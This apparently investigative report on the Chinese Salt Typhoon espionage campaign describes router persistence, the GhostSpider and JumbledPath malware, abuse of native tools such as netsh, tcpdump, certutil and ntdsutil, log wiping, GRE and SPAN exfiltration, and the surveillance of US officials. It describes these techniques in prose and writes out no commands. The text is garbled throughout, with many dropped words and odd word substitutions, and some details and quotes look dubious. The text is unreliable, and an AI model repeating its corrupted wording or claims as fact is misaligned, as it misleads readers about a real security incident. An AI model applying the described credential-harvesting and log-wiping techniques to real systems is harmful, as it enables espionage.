“The adversaries did not just steal credentials; they re-architected the trust model of the devices. By embedding themselves in the Guest Shell and the underlying Linux OS, they ensured that a factory reset of the configuration might not dislodge them. They were operating ‘ ‘ the level of the configuration file.”

The of this seizure extend beyond mere persistence. With control of the management plane, Salt Typhoon gained the ability to manipulate Border Gateway Protocol (BGP) routing tables. This capability theoretically allowed them to reroute traffic destined for specific government or military networks through their own collection points before forwarding it to its legitimate destination, a classic “man-in-the-middle” attack executed at the ISP level. While widespread BGP hijacking is noisy and easily detected, the granular control achieved here allowed for surgical redirection of specific traffic flows, minimizing the risk of discovery.

, the attackers utilized Generic Routing Encapsulation (GRE) tunnels to exfiltrate data. By creating these tunnels directly on the compromised edge routers, they could encapsulate stolen data within legitimate-looking routing traffic. This traffic was then directed to attacker-controlled infrastructure, frequently blending in with the terabytes of background noise inherent to ISP backbones. This method bypassed perimeter firewalls and intrusion detection systems that were configured to inspect user traffic, not the encapsulated control traffic of the routers themselves.

Malware Profile: Deconstructing ‘GhostSpider’ and ‘JumbledPath’

The technical sophistication of Salt Typhoon lies not in the volume of its attacks, in the specialized nature of its toolkit. Unlike groups that rely on purchased ransomware-as-a-service kits, Salt Typhoon employs bespoke malware engineered for long-term, residence within high-value networks. Forensic analysis of the 2024-2025 telecommunications breaches reveals two primary instruments of this campaign: the persistent backdoor known as “GhostSpider” and the specialized packet-capture utility dubbed “JumbledPath.” These tools function as the hands and eyes of the operation, with GhostSpider maintaining the foothold and JumbledPath executing the intelligence gathering.

GhostSpider represents the group’s primary method for persistence. Security researchers at Trend Micro and other firms identify it as a modular backdoor, frequently deployed after the initial exploitation of edge devices such as Ivanti VPNs or Microsoft Exchange servers. Written in C++, GhostSpider is designed to load directly into memory, avoiding the disk writes that frequently trigger traditional antivirus alarms. Its architecture is strictly modular; the malware pulls specific functionality from the command-and-control (C2) server only when needed. If an operator requires file exfiltration, the specific module is sent, executed, and then wiped from memory. This “just-in-time” delivery method leaves a minimal forensic footprint, complicating post-incident analysis.

A defining characteristic of GhostSpider is its use of DLL sideloading to mask its presence. The malware frequently hijacks legitimate processes, such as benign security software or system utilities, to execute its payload. By masquerading as a trusted component, GhostSpider bypasses application whitelisting. Network traffic generated by the backdoor is encrypted using TLS and frequently blended with normal HTTPS requests, making it indistinguishable from standard web browsing or API calls. This stealth allows Salt Typhoon to maintain access to compromised networks for months or even years, as seen in the breaches of major U. S. broadband providers.

While GhostSpider secures the door, JumbledPath enters to steal the secrets. Identified by investigators in late 2024, JumbledPath is a custom utility written in the Go programming language (Golang), specifically compiled to run on network appliances rather than standard servers. Its primary target is the underlying operating systems of routers and switches, particularly Cisco IOS XE and Nexus platforms. JumbledPath is not a general-purpose backdoor; it is a wiretapping tool. Its code contains specific routines for promiscuous mode packet capture, allowing it to record data traversing the device interfaces.

JumbledPath distinguishes itself through its complex routing of exfiltrated data. The utility does not send captured packets directly to a C2 server, which would create an obvious outbound traffic spike. Instead, it routes data through a series of internal “jump hosts”, compromised devices within the victim’s own network, before slowly bleeding the information out to the attacker. This technique obscures the origin of the traffic and confuses internal flow monitoring systems. also, JumbledPath includes aggressive anti-forensic capabilities. It actively suppresses logging on the infected device, blinding administrators to its operations. In several confirmed instances, the malware modified the device’s volatile memory to erase evidence of the packet capture processes immediately after execution.

Table: Technical Comparison of Salt Typhoon Primary Tools

Feature	GhostSpider	JumbledPath
Primary Function	Persistence & Command Execution	Packet Capture & Data Interception
Target Environment	Windows Servers, Virtualization Hosts	Network Edge Devices (Cisco, Linux-based)
Language	C++	Go (Golang)
Evasion Technique	DLL Sideloading, In-Memory Modules	Log Suppression, Internal Jump-Host Routing
Network Behavior	Blends with HTTPS/TLS traffic	Passive listening, slow-drip exfiltration
Discovery Date	Late 2023 (linked to Earth Estries)	Late 2024 (linked to Telco breaches)

The between these two tools creates a formidable challenge for defenders. GhostSpider provides the resilience required to survive system reboots and software updates, while JumbledPath delivers the specific intelligence value, the content of phone calls, text messages, and routing data, that the Ministry of State Security demands. The use of Go for JumbledPath also indicates a shift in development strategy, as Go binaries are cross-platform compatible and harder to reverse-engineer due to their large size and inclusion of standard libraries. This combination of high-level persistence and low-level network interception defines the Salt Typhoon operational doctrine.

Living off the Land: Evasion via Native Network Tools

Salt Typhoon’s operational longevity relies less on sophisticated zero-day exploits and more on a disciplined adherence to “Living off the Land” (LotL) tactics. By weaponizing pre-installed administrative utilities and network, the group camouflages its espionage activities within the noise of legitimate system administration. This strategy renders traditional signature-based detection useless; there is no malware hash to block when the “virus” is a standard Microsoft command-line tool executing a valid, albeit malicious, instruction.

The group’s mastery of LotL techniques is most visible in its manipulation of Windows environments. Rather than deploying custom binaries that might trigger Endpoint Detection and Response (EDR) alerts, Salt Typhoon operators use the Windows Management Instrumentation Command-line (WMIC) and PowerShell to execute code directly in memory. A primary vector involves the abuse of netsh. exe, a standard network configuration tool. Investigators have observed Salt Typhoon executing netsh interface portproxy commands to create hidden port forwarding rules. This technique transforms compromised servers into internal proxies, routing Command and Control (C2) traffic through legitimate ports like 443 or 8443, making exfiltration indistinguishable from normal web traffic.

In the telecommunications sector, Salt Typhoon applies these same principles to network infrastructure, specifically Cisco IOS and IOS XE devices. This represents a serious evolution in tradecraft: the group does not pass through routers; they inhabit them. Once access is gained, frequently via valid credentials or unpatched vulnerabilities like CVE-2023-20198, operators use the device’s native “Guest Shell,” a Linux container environment built into modern Cisco routers. From this privileged enclave, they run standard Linux utilities such as tcpdump to perform packet capture operations.

These native packet captures are surgical. Instead of recording all traffic, which would bloat logs and trigger alarms, Salt Typhoon configures filters to intercept specific authentication, such as RADIUS and TACACS+. By capturing these packets, they harvest credentials for lateral movement without ever deploying a custom sniffer. To maintain persistence, they modify the router’s running configuration to add their own SSH keys to the authorized_keys file, ensuring continued access even if passwords are reset. They have also been observed using the Cisco-specific tpacap command to mirror traffic, turning the target’s own infrastructure into a wiretapping device.

The evasion strategy extends to forensic countermeasures. Salt Typhoon systematically sanitizes logs using native commands. On Linux-based systems and network appliances, operators execute commands to delete . bash_history, auth. log, btmp, and wtmp files immediately after their sessions. In Windows environments, they use wevtutil to clear specific event logs or disable logging services entirely before executing sensitive tasks. This “clean-up” discipline creates significant gaps in incident response timelines, frequently leaving investigators with physical evidence of a breach no digital footprint of the specific actions taken.

Native Tool Weaponization Matrix

The following table details specific native utilities observed in Salt Typhoon campaigns between 2023 and 2025, contrasting their intended administrative purpose with their weaponized application.

Table: Salt Typhoon’s Abuse of Native System Tools (2023, 2025)

Native Tool / Binary	Operating System	Legitimate Administrative Use	Salt Typhoon Weaponization
netsh. exe	Windows	Network interface configuration, firewall management.	Creating portproxy rules to tunnel C2 traffic; bypassing firewall restrictions.
tcpdump	Linux / Cisco IOS	Network troubleshooting, packet analysis.	Surgical capture of RADIUS/TACACS+ authentication traffic to harvest credentials.
WMIC. exe	Windows	System management, querying WMI data.	Lateral movement; executing remote processes without dropping files to disk.
CertUtil. exe	Windows	Certificate services management.	Downloading malicious payloads from remote servers (ingress tool transfer).
Guest Shell	Cisco IOS XE	Running Linux scripts/apps on routers.	Hosting attack scripts; running python/bash tools to modify router behavior.
Ntdsutil. exe	Windows	Active Directory database maintenance.	Creating snapshots of the Active Directory database (ntds. dit) to steal all domain hashes.

“The adversary isn’t breaking in through the window; they are using the master key to walk through the front door and then using the homeowner’s own tools to the furniture. Blocking netsh or PowerShell is operationally impossible for most telcos, which is exactly why Salt Typhoon relies on them.”
, Internal CISA Threat Analysis Memo (Redacted), October 2024

Defenders face a “dual-use” dilemma. Blocking these tools cripples legitimate IT operations, yet allowing them provides Salt Typhoon with a pre-installed arsenal. The group further complicates detection by using “LOLBins” (Living off the Land Binaries) like rundll32. exe and bitsadmin. In several confirmed breaches, bitsadmin, designed for background file transfers like Windows Updates, was used to download the “JumbledPath” orchestrator, a custom script that manages the native tcpdump processes. This hybridization of custom scripts managing native tools represents the current apex of their evasion tradecraft.

Traffic Mirroring: Exfiltration through GRE Tunnels and SPAN Ports

The technical core of the Salt Typhoon espionage campaign relies on a “live off the land” strategy that weaponizes the native features of telecommunications infrastructure. Rather than deploying noisy, custom malware that might trigger endpoint detection systems, Salt Typhoon operators reconfigure the very routers and switches designed to manage global data flows. The primary method for this data theft involves the illicit use of Switched Port Analyzer (SPAN) configurations paired with Generic Routing Encapsulation (GRE) tunnels.

This technique allows the attackers to duplicate network traffic, including sensitive call data records (CDRs), SMS text messages, and audio feeds, and route it to a collection point without interrupting the original data stream. To the victim’s network operations center, the traffic appears to flow normally, while a silent copy is siphoned off to servers controlled by the Ministry of State Security (MSS).

The Mechanics of SPAN and ERSPAN Abuse

Network engineers use SPAN, also known as port mirroring, for legitimate troubleshooting and analysis. Salt Typhoon subverts this diagnostic tool for surveillance. On compromised Cisco IOS XE and IOS XR devices, investigators found unauthorized monitor session commands injected into the running configuration. These commands instruct the router to copy every packet entering or leaving a specific interface, such as those handling Voice over IP (VoIP) or roaming data, and forward it to a destination port controlled by the attackers.

For distributed networks where the target data and the exfiltration point are on different devices, the group employs Encapsulated Remote SPAN (ERSPAN). This protocol wraps the mirrored traffic in GRE headers, allowing it to traverse 3 IP networks. By configuring ERSPAN, Salt Typhoon can capture traffic from a core router deep within a telecom provider’s network and ship it to a compromised edge device for exfiltration.

Table 12. 1: Native Network Features Weaponized by Salt Typhoon

Feature	Legitimate Purpose	Salt Typhoon Abuse Case
SPAN / RSPAN	Local traffic analysis and debugging.	Silent duplication of voice, SMS, and authentication packets for surveillance.
GRE Tunnels	Encapsulating to networks.	Creating covert channels to backhaul stolen data out of the network, bypassing firewalls.
Cisco Guest Shell	Running Linux scripts on routers for automation.	Executing Python scripts (e. g., siet. py) to process traffic and capture credentials.
Access Control Lists (ACLs)	Filtering traffic for security.	Modifying rules (e. g., access-list 20) to permit exfiltration traffic and hide C2 connections.

Tunneling and Obfuscation via GRE

Once traffic is mirrored, it must be moved out of the network without raising alarms. Salt Typhoon frequently configures point-to-point GRE tunnels to encapsulate this stolen data. GRE is a standard tunneling protocol supported by virtually all enterprise routers, making its presence less suspicious than a custom encrypted connection. The attackers create tunnel interfaces on the compromised devices, assigning them private IP addresses that do not overlap with the provider’s internal routing table.

These tunnels serve two purposes., they hide the nature of the exfiltrated data. A packet inspection device might see a stream of GRE packets not the SIP signaling or RADIUS authentication headers encapsulated within. Second, they allow the attackers to route data directly to an external Command and Control (C2) node or a “hop point”, frequently another compromised router in a different victim’s network. This “operational relay” technique obscures the final destination of the data, making attribution to Chinese IP addresses difficult.

On-Device Processing with Guest Shell

To reduce the volume of data sent over these tunnels, Salt Typhoon operators perform processing directly on the network devices. Modern Cisco routers support “Guest Shell,” a virtualized Linux environment that runs alongside the router’s operating system. Forensic analysis by CISA and private security firms in 2024 and 2025 revealed that the attackers enabled Guest Shell to install open-source packet capture tools and custom scripts.

Operators used these containers to run tcpdump filters that specifically targeted authentication traffic, such as TACACS+ and RADIUS requests. By capturing these packets, they could extract cleartext or easily crackable administrative credentials, granting them further access to the network. Scripts like TCLproxy. tcl were also observed, which facilitated the modification of configuration files and the suppression of logging alerts. This method ensures that only high-value data is sent through the GRE tunnels, keeping the footprint low and avoiding traffic spikes that might trigger anomaly detection algorithms.

“The adversary does not need to break the door down when they can simply rewrite the routing table to direct traffic to their own listening posts. They are not hacking the network; they are administering it.”

The persistence of these configurations is maintained through subtle modifications to the device’s startup configuration. Unlike malware that resides in memory and upon reboot, these changes are written to the router’s non-volatile storage (NVRAM). Unless a network administrator specifically audits the running-config for unauthorized tunnel interfaces or monitor session entries, the surveillance tap remains active indefinitely.

High-Value: Surveillance of Trump, Vance, and Harris Staff

The Salt Typhoon campaign represents a catastrophic failure of telecommunications security, distinguished not by the volume of data stolen, by the precision of its. Unlike indiscriminate “smash-and-grab” cyber operations, this state-sponsored entity executed a surgical intelligence-gathering mission focused on the highest echelons of American political power during the serious months of the 2024 presidential election pattern. By infiltrating the “lawful intercept” systems of major carriers, specifically Verizon, AT&T, and Lumen Technologies, Salt Typhoon operatives bypassed device-level encryption to monitor the unencrypted metadata and communications of Donald Trump, JD Vance, and senior staff members of the Kamala Harris campaign.

Federal investigators confirmed in October 2024 that the personal cellular devices of former President Donald Trump and his running mate, Senator JD Vance, were specifically targeted. The breach was not a direct compromise of the handsets themselves (such as an exploit of iOS or Android operating systems) rather an infiltration of the carrier infrastructure that services them. This distinction is serious: by compromising the carrier’s internal switches, Salt Typhoon gained access to Call Detail Records (CDRs), logs showing who called whom, when, and for how long, and unencrypted SMS text messages. Intelligence officials have also indicated that in instances, the attackers may have accessed audio feeds of phone calls, turning the carrier’s own compliance systems into a foreign espionage tool.

The scope of the surveillance extended beyond the candidates themselves to their inner circles and families, a classic intelligence tactic designed to map social networks and identify use points. Confirmed included Eric Trump and Jared Kushner, indicating a strategy to monitor the private communications of the Trump family’s business and political advisors. On the Democratic side, the operation targeted senior aides to Vice President Kamala Harris and staff members of Senate Majority Leader Chuck Schumer. The inclusion of Schumer’s staff suggests a broad mandate to capture legislative strategy alongside executive branch maneuvering.

The technical method for this surveillance relied on the abuse of the Communications Assistance for Law Enforcement Act (CALEA) infrastructure. CALEA mandates that telecommunications providers build “backdoors” into their networks to court-authorized wiretaps by US law enforcement. Salt Typhoon operatives identified and exploited vulnerabilities in these exact systems, allowing them to problem unauthorized surveillance requests that the carrier networks treated as legitimate. This method provided the attackers with a “god-mode” view of the ‘ communications, invisible to the victims and frequently undetectable by standard endpoint security software.

Table: Confirmed High-Value in Salt Typhoon Campaign (2024)

Target Category	Specific Individuals/Groups	Nature of Compromise	Strategic Value
Republican Executive Ticket	Donald J. Trump, JD Vance	Call logs (CDRs), SMS text messages, chance audio interception via carrier switches.	Insight into campaign strategy, donor relations, and transition planning.
Trump Inner Circle	Eric Trump, Jared Kushner	Metadata analysis and communication mapping.	Mapping of informal advisory networks and business-political overlaps.
Democratic Leadership	Senior Harris Campaign Staff, Chuck Schumer Staff	Surveillance of policy formulation and legislative strategy.	Intelligence on administration policy shifts and legislative countermeasures.
Diplomatic & Policy	Unidentified Senior State Dept. Officials	Interception of unclassified diplomatic communications.	Real-time insight into US foreign policy and negotiation tactics.

The timing of the breach was calculated to maximize intelligence yield during the transition of power. Access to the communications of the Trump transition team provided the People’s Republic of China (PRC) with advance knowledge of cabinet appointments, policy priorities, and chance diplomatic postures before they were made public. For the Harris campaign, the surveillance likely aimed to gauge the administration’s internal reactions to geopolitical events and election. The data exfiltrated, particularly the metadata, allows intelligence analysts to construct “pattern of life” models, identifying who the key decision-makers trust, who they speak to late at night, and where their private alliances lie.

This operation exposed a fundamental weakness in the US national security architecture: the reliance on commercial telecommunications networks for sensitive government business. While classified communications are handled over secured networks, the vast majority of political coordination, transition planning, and personnel vetting occurs over commercial cellular lines. Salt Typhoon exploited this reality, turning the ubiquity of the smartphone against the US political establishment. The breach forced an immediate, albeit reactive, shift in operational security, with the FBI and CISA urging high-profile to abandon standard voice calls and SMS in favor of encrypted applications like Signal, which bypass carrier-level interception method.

The of the CALEA abuse are particularly severe. The systems designed to aid US law enforcement were weaponized by a foreign adversary to spy on the very officials responsible for national defense. This “lawful intercept” vulnerability remains a serious widespread risk, as the architecture of these backdoors is mandated by federal law, creating a permanent attack surface for sophisticated actors. The Salt Typhoon campaign demonstrated that if a backdoor exists for the “good guys,” it inevitably be found and used by the “bad guys.”

Beyond Telecoms: The Department of the Treasury Intrusion

While the Salt Typhoon campaign is defined by its burrowing into telecommunications infrastructure, the December 2024 of a breach at the U. S. Department of the Treasury demonstrated the actor’s capability to strike directly at the nerve center of American economic policy. This intrusion marked a serious escalation: the adversary moved from intercepting data in transit to accessing the endpoints of cabinet-level officials.

On December 8, 2024, Treasury officials were notified of anomalous activity originating from a third-party vendor. Unlike the brute-force methods seen in other campaigns, this infiltration relied on a sophisticated supply chain attack targeting BeyondTrust, a privileged access management vendor used by the department for remote technical support. The attackers did not break the front door; they stole the keys to the service entrance.

The BeyondTrust Vector

The intrusion was facilitated by the exploitation of two zero-day vulnerabilities in BeyondTrust’s Remote Support SaaS platform. By leveraging CVE-2024-12356 and CVE-2024-12686, the attackers managed to obtain an API key that allowed them to bypass authentication. This “golden key” granted them the ability to execute commands and view screens on target machines as if they were authorized IT support staff.

Forensic analysis revealed that the attackers acted with extreme discipline. They did not deploy ransomware or mass-delete files, which would have triggered immediate alarms. Instead, they moved laterally to specific workstations, prioritizing the offices of the department’s highest leadership. This targeted method aligns with the Ministry of State Security’s (MSS) mandate for strategic intelligence gathering rather than disruption.

Targeting the Leadership

The scope of the breach was surgical. Investigators confirmed that the intruders accessed approximately 400 laptop and desktop computers within the department. Among the specific were the workstations of Treasury Secretary Janet Yellen, Deputy Secretary Wally Adeyemo, and Acting Under Secretary Brad Smith.

While the department stated that classified systems and email servers remained untouched, the attackers successfully exfiltrated roughly 3, 000 files from unclassified systems. The nature of these documents suggests a keen interest in U. S. economic strategy. Specifically, the intruders accessed “law enforcement sensitive” data and materials related to the Committee on Foreign Investment in the United States (CFIUS). CFIUS is the interagency body responsible for reviewing foreign investments in U. S. companies for national security risks, a primary method the U. S. uses to block Chinese acquisition of sensitive American technology.

Incident Component	Details
Discovery Date	December 8, 2024
Attack Vector	Supply chain compromise via BeyondTrust Remote Support SaaS
Exploited Vulnerabilities	CVE-2024-12356 (Command Injection), CVE-2024-12686 (Auth Bypass)
Primary	Sec. Janet Yellen, Dep. Sec. Wally Adeyemo, CFIUS investigative files
Attributed Entity	Yin Kecheng (MSS Affiliate) & Sichuan Juxinhe Network Technology

Attribution and Sanctions

The U. S. government’s response was swift and specific, formally linking the Treasury intrusion to the broader Salt Typhoon apparatus. On January 17, 2025, the Office of Foreign Assets Control (OFAC) imposed sanctions on Sichuan Juxinhe Network Technology Co., Ltd. and an individual hacker named Yin Kecheng.

Treasury officials identified Yin Kecheng as an affiliate of the Chinese Ministry of State Security with over a decade of experience in cyber espionage. The sanctions designation explicitly connected Sichuan Juxinhe to the Salt Typhoon group, noting the company’s “direct involvement” in the compromise of multiple U. S. telecommunications providers. This action confirmed that the Treasury breach was not an incident part of the same coordinated intelligence campaign that had ravaged the telecom sector.

The exposure of CFIUS files represents a significant strategic loss. Information regarding which foreign transactions are under scrutiny, and the internal deliberations of the committee, provides Beijing with a roadmap to navigate or circumvent U. S. investment restrictions. By understanding the specific red flags that trigger a CFIUS blockage, Chinese state-owned enterprises can restructure future deals to avoid detection, weaponizing the Treasury’s own regulatory data against it.

Global Footprint: Espionage Operations Across 80+ Nations

The that Salt Typhoon breached major American telecommunications providers dominated Western headlines in 2024 and 2025. Yet this focus obscured the operational reality defined by federal investigators in August 2025. The Federal Bureau of Investigation and international intelligence partners confirmed that the state-sponsored entity targeted over 80 nations. This campaign was not a surgical strike against the United States a global dragnet designed to secure total informational dominance. The actors did not compromise networks. They themselves into the digital backbones of dozens of allied and non-aligned countries to monitor diplomatic communications and track the movement of high-value individuals.

Intelligence assessments released by the Five Eyes alliance indicate that the Salt Typhoon cluster, which overlaps with activity tracked as GhostEmperor and FamousSparrow, maintains a persistent presence in every major geopolitical theater. The group prioritizes nations with strategic relevance to the People’s Republic of China. This includes Belt and Road Initiative partners, South China Sea claimants, and members of NATO. While the United States remains the primary counterintelligence target, the sheer volume of compromised infrastructure in Southeast Asia and Europe suggests a broader mandate. The Ministry of State Security (MSS) uses these compromised foreign networks not only for local espionage also as operational relay points to obfuscate attacks against harder in Washington and London.

Regional Distribution of Compromise

The Asia-Pacific region bears the heaviest concentration of Salt Typhoon activity. Security researchers at Trend Micro and Kaspersky identified long-standing infections in Malaysia, Thailand, Vietnam, and Indonesia. These operations frequently align with territorial disputes or economic negotiations. In the Philippines, the group targeted government agencies and telecommunications firms during periods of heightened naval tension in the West Philippine Sea. Taiwan remains a constant target. The actors systematically infiltrate technology parks and government ministries in Taipei to expropriate semiconductor intellectual property and monitor political leadership.

Operations in Europe and the Middle East reveal a different tactical focus. The “FamousSparrow” activity cluster associated with Salt Typhoon heavily targeted the hospitality sector in France, the United Kingdom, and Lithuania. a specific intent to monitor the physical movements and private meetings of diplomats or business executives staying in compromised hotels. In the Middle East, the group breached government networks in Israel and Saudi Arabia. These intrusions likely serve to gather intelligence on energy policy and regional security arrangements that impact Chinese energy imports.

Region	Confirmed Target Nations (Selected)	Primary Sector Focus
Asia-Pacific	Taiwan, Philippines, Malaysia, Vietnam, Indonesia, Thailand	Telecommunications, Government Ministries, Semiconductor Engineering
Americas	United States, Canada, Brazil, Guatemala	serious Infrastructure, Federal Law Enforcement, ISPs
Europe	United Kingdom, France, Germany, Lithuania	Hospitality (Hotels), Foreign Affairs, Transportation
Middle East & Africa	Israel, Saudi Arabia, Egypt, South Africa, Burkina Faso	Energy, Diplomatic Communications, Regional Governance

Infrastructure Hijacking as a Global Strategy

A defining characteristic of the Salt Typhoon global footprint is the weaponization of edge devices. The group exploits vulnerabilities in routers and firewalls manufactured by Cisco, Fortinet, and DrayTek to create a mesh of proxy nodes. By compromising a router in Brazil or a firewall in South Africa, the attackers route their malicious traffic through legitimate devices. This technique masks the origin of the attack and complicates attribution. In late 2024, investigators discovered that thousands of unpatched Cisco routers in the United Kingdom and Canada were being used as operational relays for the group. This “living-off-the-land” method allows Salt Typhoon to operate inside the borders of 80+ nations without deploying custom malware to every endpoint.

The scope of this campaign forces a reevaluation of global cyber defense. A breach in a telecommunications provider in Jakarta or a hotel in Paris is no longer an incident. It is a component of an integrated intelligence apparatus. The data exfiltrated from these diverse locations feeds into a centralized repository managed by the MSS. This allows Chinese intelligence analysts to build detailed profiles of that include their call records from the US, their travel history from Europe, and their business negotiations in Asia. The 80-nation footprint is not a list of random victims. It is a map of the MSS’s intelligence requirements.

The “Earth Estries” Connection

Forensic analysis links the Salt Typhoon moniker to the activity tracked as “Earth Estries” by Trend Micro. This specific sub-cluster demonstrates the group’s aggressive posture in the Global South. Earth Estries compromised over 20 distinct organizations in 2024 alone. These included government entities in Eswatini and Brazil. The inclusion of such nations highlights the group’s mandate to monitor diplomatic shifts in the developing world. The attackers utilized the “GhostSpider” backdoor to maintain persistence in these environments. This tool allows for the silent exfiltration of documents and emails over encrypted channels. The ability to operate in environments with lower cybersecurity maturity provides Salt Typhoon with a steady stream of geopolitical intelligence that frequently goes unnoticed by Western observers.

Counterintelligence Catastrophe: Exposing US Surveillance Assets

The most damaging dimension of the Salt Typhoon campaign was not the theft of consumer data the total compromise of the United States’ “lawful intercept” infrastructure. By penetrating the systems telecommunications providers maintain to comply with the Communications Assistance for Law Enforcement Act (CALEA), Chinese state-sponsored hackers inverted the surveillance. Instead of eavesdropping on American, the Ministry of State Security (MSS) accessed the specific portals the FBI and NSA use to monitor foreign spies.

This breach provided Beijing with a real-time list of every Chinese intelligence officer, asset, and operative currently under investigation by US federal authorities. Federal investigators discovered that Salt Typhoon operators did not just stumble upon these systems. They specifically hunted for the “handover” points where commercial networks interface with government surveillance equipment. At major carriers including AT&T, Verizon, and Lumen Technologies, the attackers located the portals used to process court-authorized wiretaps.

Once inside, they could view the phone numbers and data streams targeted by US warrants. This exposure represents a catastrophic failure of operational security for American counterintelligence. If a foreign intelligence service knows exactly which of its operatives are being watched, it can instruct them to go silent, feed disinformation to the listening Americans, or burn their networks and flee the country. The technical execution of this breach relied on exploiting legacy infrastructure within the carriers’ networks.

In several instances, the “lawful intercept” systems, designed to be the most secure enclaves within a telecom provider, were protected by obsolete firewalls and weak authentication. Investigators found that management interfaces for these serious systems were secured with passwords as simple as “1111” or “solarwinds123”. This negligence allowed Salt Typhoon to move laterally from general corporate networks into the sensitive zones where wiretap data is aggregated before transmission to law enforcement agencies.

The Surveillance Inversion: Salt Typhoon’s Access to CALEA Infrastructure

System Component	Intended Function	Salt Typhoon Exploitation
Warrant Management Portals	Process court orders for wiretaps.	Identified specific of FBI/NSA investigations.
Mediation Devices	Format audio/data for law enforcement.	Intercepted unencrypted audio and SMS before handover.
CDR Repositories	Store Call Detail Records (metadata).	Mapped social networks of US intelligence officials.
Cisco/Juniper Routers	Direct traffic flow.	Used as proxy hop points to mask exfiltration.

The scope of the exfiltration extended beyond metadata. In October 2024, the *Wall Street Journal* and *Washington Post* confirmed that the hackers accessed the full audio of phone calls and unencrypted text messages for a select group of high-value. This group included senior figures in the US government and national security apparatus. yet, the strategic loss remains the exposure of the “watch lists.”

For years, the FBI operates on the assumption that its surveillance is clandestine. The Salt Typhoon breach shattered this assumption. Every counterintelligence investigation involving Chinese assets initiated between 2019 and 2024 must be reviewed under the premise that the were aware of the surveillance. Lumen Technologies, a serious backbone provider that carries of US government traffic, was one of the primary victims.

The breach at Lumen was particularly severe because it exposed the underlying transport used by other carriers and government agencies. By compromising the routers at the core of the internet, Salt Typhoon could monitor traffic patterns that revealed not just *what* was being said, *who* was communicating with US intelligence services. This traffic analysis capability allows the MSS to identify chance defectors or whistleblowers within their own ranks who attempted to contact American authorities. The operational forces a complete architectural overhaul of how the US government interacts with commercial telecommunications providers.

The trust model inherent in CALEA, which assumes that telecom carriers can securely hold the keys to the kingdom, is broken. Senate Intelligence Committee Chairman Mark Warner described the breach as one of the most serious in history because it strikes at the fundamental ability of the US to police espionage within its own borders. Until these lawful intercept systems are rebuilt with military-grade isolation, federal agencies face the paradox that obtaining a warrant to wiretap a Chinese spy may immediately alert that spy to the investigation.

Corporate Fronts: The Sanctioning of Sichuan Juxinhe Network Technology

On January 17, 2025, the United States Department of the Treasury’s Office of Foreign Assets Control (OFAC) pierced the corporate veil of the Salt Typhoon operation, formally sanctioning Sichuan Juxinhe Network Technology Co., Ltd. (Sichuan Juxinhe). This designation marked a pivotal shift in attribution strategy, moving beyond the identification of anonymous threat clusters to naming the specific commercial entities that contract with China’s Ministry of State Security (MSS) to execute cyber-espionage campaigns. Unlike previous indictments that targeted individual officers, this action exposed the commercial infrastructure that sustains state-sponsored intrusion activities.

Sichuan Juxinhe, ostensibly a legitimate cybersecurity firm based in the Sichuan province, was identified by Treasury officials as having “direct involvement” in the Salt Typhoon intrusions. Investigations revealed that the company did not provide passive support; it actively developed and deployed the exploits used to compromise the management interfaces of Cisco routers within U. S. telecommunications networks. The firm operated as a prime example of the PRC’s civil-military fusion strategy, where private technology companies are conscripted to supply the MSS with hacking tools, vulnerability research, and operational manpower. The sanctions froze any U. S. assets held by the company and criminalized any financial transactions with it by U. S. persons.

The January 17 action also targeted Yin Kecheng, a Shanghai-based cyber actor affiliated with the MSS, linking him to the compromise of the U. S. Department of the Treasury’s own networks. This simultaneous designation highlighted the operational overlap between individual MSS operators and the corporate fronts that support them. Intelligence reports released alongside the sanctions indicated that Sichuan Juxinhe served as a logistical hub, procuring infrastructure and laundering the digital footprints of Salt Typhoon operators. By operating under the guise of a private enterprise, the group could purchase servers, register domains, and recruit talent from Chinese universities without immediately triggering the alarms associated with known military units.

Table 17. 1: Key Entities Sanctioned in Connection with Salt Typhoon (Jan 2025)

Entity / Individual	Role / Affiliation	Sanction Date	Specific Allegations
Sichuan Juxinhe Network Technology Co., Ltd.	MSS Contractor (Corporate Front)	Jan 17, 2025	Direct involvement in Salt Typhoon telecom breaches; development of router exploits.
Yin Kecheng	MSS Affiliate (Individual Actor)	Jan 17, 2025	Compromise of U. S. Treasury networks; data exfiltration from serious infrastructure.
Sichuan Silence Information Technology	MSS Contractor	Dec 10, 2024	Precursor activity; dangerous firewall compromises linked to broader MSS campaigns.

The scrutiny on Sichuan Juxinhe intensified later in 2025. On August 27, 2025, the National Security Agency (NSA), in coordination with the FBI and international partners, released a joint Cybersecurity Advisory that placed Sichuan Juxinhe at the center of a broader ecosystem of MSS contractors. This advisory identified two additional companies, Beijing Huanyu Tianqiong Information Technology Co., Ltd. and Sichuan Zhixin Ruijie Network Technology Co., Ltd., as collaborators in the same supply chain. These firms shared provided the “cyber products and services” that enabled Salt Typhoon’s global reach. The advisory detailed how these companies shared vulnerability data and exploit code, industrializing the process of finding and weaponizing zero-day flaws in edge network devices.

The U. S. Department of State escalated the pressure by offering a reward of up to $10 million through its Rewards for Justice program for information leading to the identification or location of any person acting at the direction of a foreign government to engage in these malicious cyber activities. This bounty, paired with the sanctions, aimed to destabilize the internal cohesion of the MSS contractor network. By naming Sichuan Juxinhe, U. S. officials stripped away the plausible deniability that the Chinese government frequently employs when attributing cyberattacks to “criminal elements” or “patriotic hackers.” The evidence presented demonstrated a clear, contractual command-and-control relationship between the state intelligence apparatus and the private entities executing the Salt Typhoon campaign.

The Human Operators: Indictments of MSS-Affiliated Hackers

The anonymity of the ‘Salt Typhoon’ campaign was pierced on January 17, 2025, when the United States Department of the Treasury formally sanctioned Yin Kecheng and the front company Sichuan Juxinhe Network Technology Co. Ltd. for their direct role in the infiltration of U. S. telecommunications infrastructure. While cyberespionage is frequently discussed in abstract terms of malware and server logs, these designations identified the specific human actors and corporate structures responsible for the campaign. The action confirmed that Salt Typhoon operates not as a rogue criminal gang, as a disciplined arm of the People’s Republic of China’s Ministry of State Security (MSS), utilizing a complex ecosystem of private contractors to execute state directives.

Yin Kecheng, identified as a Shanghai-based cyber operator, represents the modern archetype of a state-sponsored hacker. Unlike the stereotype of a solitary figure in a basement, Yin and his associates operate within a corporate hierarchy, frequently clocking regular business hours at technology firms that serve as fronts for intelligence operations. The Treasury Department’s investigation revealed that Sichuan Juxinhe Network Technology Co. Ltd. acted as the operational hub for Salt Typhoon, providing the physical infrastructure, recruitment channels, and technical cover necessary to launch attacks against major U. S. broadband providers including Verizon, AT&T, and Lumen Technologies.

